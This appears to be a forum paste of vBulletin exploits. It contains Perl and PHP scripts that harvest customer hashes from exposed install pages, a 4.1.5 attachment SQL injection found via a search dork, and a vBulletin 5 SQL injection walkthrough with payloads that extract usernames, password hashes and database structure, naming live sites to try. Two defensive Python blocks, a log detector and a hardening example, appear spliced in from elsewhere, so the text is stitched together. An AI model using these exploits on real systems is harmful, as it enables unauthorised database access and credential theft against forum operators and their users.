- vBulletin x.x.x Customer Area 0day
- -------------------------------------------------
- Perl script got leaked so decided to post the perl script here
- Code:
- #!/usr/bin/perl
- use LWP::UserAgent;
- use HTTP::Request::Common;
- system('cls');
- system('title vBulletin Install Auto Exploiter');
- print "\n ---------------------------------------";
- print "\n vBulletin Install Auto Exploiter founded by pixel_death, n3tw0rk & z0ne\n";
- print " ---------------------------------------\n";
- print " + d4tabase.com -+- d4tabase.com + ";
- print "\n ---------------------------------------\n";
- print " coded by n0tch shoutz d4tabase crew ";
- print "\n ---------------------------------------\n";
- if($#ARGV == -1 or $#ARGV > 0)
- {
- print "\n usage: ./vBulletin.pl domain (without http://) \n\n";
- exit;
- }
- $domain = $ARGV[0];
- $install_dir = "install";
- $full_domain = "http://$domain/$install_dir/upgrade.php";
- chop($domain);
- &search;
- sub search
- {
- $url = $full_domain;
- $lwp = LWP::UserAgent->new();
- $lwp -> agent("Mozilla/5.0 (X11; U; Linux i686 (x86_64); de; rv:1.9.1.8) Gecko/20100202 Firefox/3.5.8");
- $request = $lwp->post($url, ["searchHash" => "Search"]);
- print " Searching $domain ----\n ";
- if ($request->content =~ /CUSTNUMBER = \"(.+)\";/)
- {
- print "Result : $1\n";
- } else {
- print "Hash: Hash not found!\n";
- }
- }
- php exploit -
- --------------------
- <?php
- set_time_limit(0);
- if($argc < 2) {
- echo "Usage: {$argv[0]} http://site.ru/forum" . PHP_EOL;
- exit;
- }
- $URL = $argv[1];
- $arr = parse_url($URL);
- ### work with url
- if(strpos($URL, '?')) die("Ohh, your URL is not valid");
- if(substr($URL, -1, 1) != '/') $URL = $URL . '/';
- if(!$arr['scheme']) $URL = 'http://' . $URL;
- $headers = get_headers($URL . '/install/upgrade.php');
- if(substr($headers[0], 9, 3) == '200') {
- $source = file_get_contents($URL . "/install/upgrade.php");
- }
- elseif($headers = get_headers($URL . '/install/finalupgrage.php')) {
- if(substr($headers[0], 9, 3) == '200') $source = file_get_contents($URL . "/install/finalupgrage.php");
- }
- else die("something went wrong...");
- preg_match_all('|var CUSTNUMBER = "(.*?)";|', $source, $res);
- foreach ($res[1] as $hash) {
- echo "Hash: " . $hash . PHP_EOL;
- $fp = fopen("hash.txt", "a+");
- fwrite($fp, $hash . PHP_EOL);
- }
- ?>
- ------------------------------------------------------------------------
- vbulletin 4.1.5 attachment SQLI
- While examining variables I came across an SQL injection which, as I later found, is inherent to all vBulletin 4.1.5 installations.
- Title: Vulnerability in vBulletin 4.1.5
- Dork: Powered by Powered by vBulletin 4.1.5
- Conditions: An account on the forum. Permission to attach files to messages / themes (attachments).
- Register -> go to the forum -> click a topic or, if the board has it, you can choose to create an article (the second option more work) -> at the bottom look for Attachments, 'Manage Attachments' -> open the window and in the "values[f]" setting insert our SQL query. Example:
- Code:
- http://site.com/board/newattachment.php?do=assetmanager&values[f]=-1599+or(1,2)=(select*from(select+name_const(version(),1),name_const(version(),1))a)&contenttypeid=18&poststarttime=1360663633&posthash=4f5c850593e10c5450d9e880d58a56d8&insertinline=1
- After that, we see the standard database error page, so we open the source code of the page and see:
- Code:
- <! -
- Database error in vBulletin 4.1.5 :
- Invalid SQL :
- SELECT
- permissionsfrom , Hidden , setpublish , publishdate , userid
- FROM ds23fSDdfsdf_cms_node
- WHERE
- nodeid = - 1599 or ( 1 , 2 ) = ( Select * from ( Select name_const ( version () , 1 ), name_const ( version (), 1 )) a );
- MySQL Error : Duplicate column Name .1.49-3 '5 '
- Error Number : 1060
- Request Date : Tuesday , February 12th 2013 @ 01 : 12 : 33 PM
- Error Date : Tuesday , February 12th 2013 @ 01 : 12 : 33
- Address : 127.0.0.1
- Username : Hacker
- Classname : vB_Database
- MySQL Version :
- ->
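For defenders, both the install-script requests and the `values[f]` injection above leave recognisable traces in web server access logs. The detector below is an added example, not part of the original paste; the log lines are constructed samples and the function names are hypothetical.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Constructed sample lines in combined log format (not taken from the page).
SAMPLE_LOG = [
    '203.0.113.5 - - [12/Feb/2013:13:12:30 +0000] "GET /board/showthread.php?t=12 HTTP/1.1" 200 5120',
    '203.0.113.9 - - [12/Feb/2013:13:12:31 +0000] "POST /install/upgrade.php HTTP/1.1" 200 20480',
    '203.0.113.9 - - [12/Feb/2013:13:12:33 +0000] "GET /board/newattachment.php'
    '?do=assetmanager&values[f]=-1599+or(1,2)=(select*from(select+1)a)&contenttypeid=18 HTTP/1.1" 200 900',
    '198.51.100.7 - - [12/Feb/2013:13:13:02 +0000] "GET /board/newattachment.php'
    '?do=assetmanager&values[f]=42&contenttypeid=18 HTTP/1.1" 200 7000',
    '198.51.100.8 - - [12/Feb/2013:13:14:00 +0000] "GET /install/upgrade.php HTTP/1.1" 404 300',
]

LINE_RE = re.compile(r'^(\S+) \S+ \S+ \[[^\]]+\] "(\S+) (\S+) [^"]*" (\d{3})')
INSTALL_RE = re.compile(r"/install/[^/]+\.php$", re.I)
INT_RE = re.compile(r"-?[0-9]+")
# Parameters the page shows being abused; both should only ever carry an integer.
# POST bodies are not in access logs, so nodeid is only seen here when sent in the URL.
INT_PARAMS = {"values[f]", "nodeid"}


def classify(line):
    """Return a list of (client_ip, finding) tuples for one access-log line."""
    m = LINE_RE.match(line)
    if not m:
        return []
    ip, method, target, status = m.groups()
    url = urlsplit(target)
    findings = []
    # A 200 on anything under /install/ means the installer was left on the server.
    if INSTALL_RE.search(url.path) and status == "200":
        findings.append((ip, f"install script reachable: {method} {url.path}"))
    # parse_qs URL-decodes names and values, so encoded brackets are covered too.
    for name, values in parse_qs(url.query, keep_blank_values=True).items():
        if name in INT_PARAMS:
            for value in values:
                if not INT_RE.fullmatch(value):
                    findings.append((ip, f"non-integer {name} on {url.path}"))
    return findings


def scan(lines):
    """Run classify() over many lines and flatten the findings."""
    return [finding for line in lines for finding in classify(line)]


if __name__ == "__main__":
    for ip, finding in scan(SAMPLE_LOG):
        print(ip, finding)
```

A finding of the first kind is also a configuration fix in itself: the `install` directory should not be present on a production forum.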
- ----------------------------------------------
- vBulletin 5.0.0 all Beta releases SQL Injection Exploit 0day
- ******************************************************************
- #Title: vBulletin 5 SQL Injection > Beta Whatever
- #Author: 0x0A
- #Date: Dec 11, 2012
- #Category: web application
- #Type: SQL Injection
- #Requirements: Firefox/Live HTTP Headers/
- #Software Link: http://www.vbulletin.com/purchases/
- http://www.vbulletin.com/features/
- #Homepage: hackyard.net
- ***********.com
- #Version: 5 and above(not older versions)
- #Tested on: Linux bt 3.2.6 #1 SMP Fri Feb 17 10:40:05 EST 2012 i686 GNU/Linux
- #Demo sites to try: http://www.sultantheme.com/vb5connectforum/
- http://vb5connect.com/bb/
- ******************************************************************
- -------------------------------------------------------------------
- How to
- -------------------------------------------------------------------
- [#1] First of all, make an account to the vBulletin 5 forum,
- http://img402.imageshack.us/img402/7784/69376730.png
- -------------------------------------------------------------------
- [#2] After that, go to any topic and open Live HTTP Headers (https://addons.mozilla.org/en-us/fir...-http-headers/)
- http://imageshack.us/a/img12/305/89268702.png
- -------------------------------------------------------------------
- [#3] After that click the Like button, you will receive almost the same result as me. Go to the first POST record as the picture below and click Replay button,
- http://imageshack.us/a/img707/9990/68621087.png
- -------------------------------------------------------------------
- [#4] Then, on Send POST Content use this:
- -------------------------------------------------------------------------------------------------------------------------------------------------------------------
- nodeid=70) and(select 1 from(select count(*),concat((select (select (SELECT concat(0x7e,0x27,username,0x27,0x7e,password,0x27, 0x7e) FROM user LIMIT 1,1) ) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) AND (1338=1338
- -------------------------------------------------------------------------------------------------------------------------------------------------------------------
- http://imageshack.us/a/img42/1590/26447606.png
- //Note: keep the nodeid value as it was by default in the POST content. Otherwise you'll get an invalid nodeid error.
- The following SQLi command will fetch out the first record from user table(username/password).
- -------------------------------------------------------------------
- [#Other SQLi Syntaxes]
- +------------------------------------------------------------------------------------------------------------------------------------------------------------------+
- |Version():
- +------------------------------------------------------------------------------------------------------------------------------------------------------------------+
- nodeid=70) and(select 1 from(select count(*),concat((select (select concat(0x7e,0x27,cast(version() as char),0x27,0x7e)) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) AND (1338=1338
- +------------------------------------------------------------------------------------------------------------------------------------------------------------------+
- +------------------------------------------------------------------------------------------------------------------------------------------------------------------+
- |User():
- +------------------------------------------------------------------------------------------------------------------------------------------------------------------+
- +------------------------------------------------------------------------------------------------------------------------------------------------------------------+
- nodeid=70) and(select 1 from(select count(*),concat((select (select concat(0x7e,0x27,cast(user() as char),0x27,0x7e)) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) AND (1338=1338
- +------------------------------------------------------------------------------------------------------------------------------------------------------------------+
- +------------------------------------------------------------------------------------------------------------------------------------------------------------------+
- |Database():
- +------------------------------------------------------------------------------------------------------------------------------------------------------------------+
- +------------------------------------------------------------------------------------------------------------------------------------------------------------------+
- nodeid=70) and(select 1 from(select count(*),concat((select (select concat(0x7e,0x27,cast(database() as char),0x27,0x7e)) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) AND (1338=1338
- +------------------------------------------------------------------------------------------------------------------------------------------------------------------+
- +------------------------------------------------------------------------------------------------------------------------------------------------------------------+
- |Database Print:
- +------------------------------------------------------------------------------------------------------------------------------------------------------------------+
- +------------------------------------------------------------------------------------------------------------------------------------------------------------------+
- nodeid=70) and(select 1 from(select count(*),concat((select (select (SELECT distinct concat(0x7e,0x27,cast(schema_name as char),0x27,0x7e) FROM information_schema.schemata LIMIT 1,1)) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) AND (1338=1338
- +------------------------------------------------------------------------------------------------------------------------------------------------------------------+
- +------------------------------------------------------------------------------------------------------------------------------------------------------------------+
- |Table Count:
- +------------------------------------------------------------------------------------------------------------------------------------------------------------------+
- +------------------------------------------------------------------------------------------------------------------------------------------------------------------+
- nodeid=70) and(select 1 from(select count(*),concat((select (select (SELECT concat(0x7e,0x27,count(table_name),0x27,0x7e) FROM `information_schema`.tables WHERE table_schema=0xHEXCODEOFDATABASE)) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) AND (1338=1338
- +------------------------------------------------------------------------------------------------------------------------------------------------------------------+
- +------------------------------------------------------------------------------------------------------------------------------------------------------------------+
- |Print Tables:
- +------------------------------------------------------------------------------------------------------------------------------------------------------------------+
- +------------------------------------------------------------------------------------------------------------------------------------------------------------------+
- nodeid=70) and(select 1 from(select count(*),concat((select (select (SELECT distinct concat(0x7e,0x27,cast(table_name as char),0x27,0x7e) FROM information_schema.tables Where table_schema=0xHEXCODEOFDATABASE LIMIT N,1)) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) AND (1338=1338
- +------------------------------------------------------------------------------------------------------------------------------------------------------------------+
- +------------------------------------------------------------------------------------------------------------------------------------------------------------------+
- |Columns of selected table:
- +------------------------------------------------------------------------------------------------------------------------------------------------------------------+
- +------------------------------------------------------------------------------------------------------------------------------------------------------------------+
- nodeid=70) and(select 1 from(select count(*),concat((select (select (SELECT concat(0x7e,0x27,count(column_name),0x27,0x7e) FROM `information_schema`.columns WHERE table_schema=0xhex_code_of_database_name AND table_name=0xhex_code_of_table_name)) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) AND (1338=1338
- +------------------------------------------------------------------------------------------------------------------------------------------------------------------+
- +------------------------------------------------------------------------------------------------------------------------------------------------------------------+
- |Fetch Out Data:
- +------------------------------------------------------------------------------------------------------------------------------------------------------------------+
- +------------------------------------------------------------------------------------------------------------------------------------------------------------------+
- nodeid=70) and(select 1 from(select count(*),concat((select (select (SELECT concat(0x7e,0x27,column1,0x27,0x7e,column2,0x27,0x 7e) FROM ANY_TABLE LIMIT N,1) ) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) AND (1338=1338
- +------------------------------------------------------------------------------------------------------------------------------------------------------------------+
- ----------------------------------------------------
- ==[ That`s it!
- ==[ Thanks, 0x0A!
- ==[ Romania
- ----------------------------------------------------
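The injections above work because a parameter that should only ever be an integer (`nodeid` here, `values[f]` in the 4.1.5 case) reaches the SQL statement as raw text. The following is an added example, not vBulletin's code and not part of the original paste: it assumes a parenthesised `WHERE (nodeid = ...)` shape inferred from the payload's unbalanced parentheses, uses sqlite3 with a constructed table as an offline stand-in for MySQL, and all function names are hypothetical.

```python
import re
import sqlite3
from urllib.parse import parse_qs

# Constructed, shortened POST body with the same shape as the payloads on this page.
PAYLOAD_BODY = "nodeid=70) and(select 1) AND (1338=1338"


def make_db():
    """Constructed stand-in for the node table (sqlite3 instead of MySQL)."""
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE node (nodeid INTEGER PRIMARY KEY, userid INTEGER, publishdate INTEGER)")
    db.execute("INSERT INTO node VALUES (70, 1, 1355184000)")
    return db


def unsafe_sql(raw_nodeid):
    """Vulnerable pattern: request text is pasted into the statement.

    Only builds the string, to show how '70)' closes the application's own
    parenthesis and '(1338=1338' re-opens one to keep the statement valid.
    """
    return "SELECT userid, publishdate FROM node WHERE (nodeid = " + raw_nodeid + ")"


def parse_nodeid(post_body):
    """Accept exactly one nodeid made only of ASCII digits, else raise ValueError."""
    values = parse_qs(post_body, keep_blank_values=True).get("nodeid", [])
    if len(values) != 1 or not re.fullmatch(r"[0-9]{1,10}", values[0]):
        raise ValueError("invalid nodeid")
    return int(values[0])


def fetch_node(db, post_body):
    """Hardened path: validate first, then bind the value as a query parameter."""
    nodeid = parse_nodeid(post_body)
    return db.execute(
        "SELECT userid, publishdate FROM node WHERE nodeid = ?", (nodeid,)
    ).fetchone()


if __name__ == "__main__":
    db = make_db()
    print(unsafe_sql(PAYLOAD_BODY.split("=", 1)[1]))  # attacker text becomes SQL structure
    print(fetch_node(db, "nodeid=70"))                # legitimate request still works
    try:
        fetch_node(db, PAYLOAD_BODY)
    except ValueError as exc:
        print("rejected:", exc)                       # payload never reaches the database
```

Validation and parameter binding close the injection itself; the verbose "Database error" page shown earlier, which echoes the failing SQL into the response, should also be disabled in production so that query errors are logged server-side only.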